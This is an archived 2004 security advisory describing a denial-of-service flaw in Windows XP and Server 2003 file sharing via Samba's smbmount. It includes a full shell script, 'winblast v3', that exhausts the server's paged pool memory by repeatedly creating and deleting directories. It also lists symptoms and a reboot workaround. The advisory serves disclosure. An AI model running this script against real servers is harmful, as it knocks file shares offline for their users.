home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / smbmountDoS.txt < prev    next >
Text File  |  2005-02-12  |  4KB  |  125 lines

  1. Announced: 2004-02-02
  2. Type: Denial of Service Attack on Windows
  3. Impact: smbmount can stop Windows from sharing files
  4. Writer: Daniel Kabs, Germany (daniel.kabs@gmx.de)
  5. Credits: Thanks to Steve Ladjabi (steve.ladjabi@web.de)
  6.  
  7. Contents:
  8. 1. Abstract
  9. 2. Affected Systems
  10. 3. Attack Setup
  11. 4. Symptoms 
  12. 5. Workaround
  13.  
  14.  
  15. 1. Abstract
  16.  
  17. A security vulnerability of "Windows XP" and "Windows 2003
  18. Server" has been found. Theses systems are open to a denial
  19. of service attack. If they share folders to a Unix client
  20. that is using smbmount (part of the Samba suite), any user
  21. on the client who has permissions to create directories on
  22. the mounted share can stop the Windows system from serving
  23. files. The attack induces a memory shortage on the Windows
  24. system by creating directories in a special way.
  25.  
  26. 2. Affected Systems
  27.  
  28. This denial of service attack has been carried out
  29. successfully against
  30. - Microsoft Windows XP Professional, Service Pack 1
  31. - Microsoft Windows Server 2003
  32.  
  33. Microsoft Windows 2000 Prof. and earlier versions of
  34. Windows are not affected by this attack.
  35.  
  36. 3. Attack Setup
  37.  
  38. The attack was carried out successfully using
  39. - "Debian Linux", smbmount 3.0.0beta2
  40. - "Suse Linux 8.2", smbmount version 2.2.2
  41. as Unix clients
  42.  
  43. The Windows system shares a folder. The Unix client mounts
  44. the share using smbmount. A user on the Unix client has
  45. write/create permissions to it the shared folder.
  46.  
  47. The user on the client creates and deletes a lot of
  48. directories on the mounted share using the following
  49. script:
  50.  
  51. #!/bin/sh
  52. # winblast v3 - DoS on WinXP, Win2003Srv
  53. # 2003-12-04 Steve Ladjabi
  54.  
  55. count=0
  56.  
  57. # using 'pathcount' directories
  58. pathcount=1000
  59.  
  60. echo running \'winblast v3\' with $pathcount files in loop
  61. ...
  62.  
  63. while [ 1 ]; do
  64.   p=$((pathcount*2-1))
  65.   stop=$((pathcount-1))
  66.   while [ "$p" != "$stop" ]; do
  67.     dirname=wbst$p
  68.     # delete old directory if it exists, exit on any error
  69.     if [ -d $dirname ]; then
  70.       rmdir $dirname || exit 3
  71.     fi;
  72.  
  73.     # generating directory and exit on any error
  74.     mkdir $dirname || exit 1
  75.     p=$((p-1))
  76.     count=$((count+1))
  77.   done;
  78.   echo $count directories generated ...
  79. done;
  80. #-- end --
  81.  
  82. The script will create 1000 directories and then takes
  83. turns deleting and re-creating them. There will be no
  84. more than those 1000 directories at any time!
  85.  
  86. Every time a directory is created, the Windows system
  87. allocates paged pool memory. This memory is not freed
  88. although the directory gets deleted.
  89.  
  90. After having created and deleted 3.5 millions directories,
  91. the Windows system's paged pool memory has been depleted
  92. and it denies access to the share. One tested Windows XP
  93. system managed to take 5.8 millions directories until it
  94. stopped serving. This happens about 4 hours after the
  95. attack was started.
  96.  
  97. 4. Symptoms 
  98.  
  99. When the Windows system suddenly fails, it ceases serving,
  100. i.e. users can not access files nor list directory contents
  101. any more from the client. Any client will have lost its
  102. access the the share.
  103.  
  104. On the Windows system the event log shows an error with
  105. event id 2020.
  106.  
  107. Additionally, the Administrator of the Windows system can
  108. neither unshare the folder nor kill the session due to the
  109. lack of memory resources. Trying to open the managment
  110. console will result in error messages to this effect.
  111. Executing the command "net share /delete" fails due to
  112. the memory shortage.
  113.  
  114. The only way to get the Windows system working again is
  115. to reboot it.
  116.  
  117. Putting more RAM in the maching running Windows will not
  118. help as the paged pool memory is limited to 343MB. (See
  119. MS KB article Q312362).
  120.  
  121. 5. Workaround
  122.  
  123. Administrator should schedule a daily reboot of the
  124. Windows system.
  125.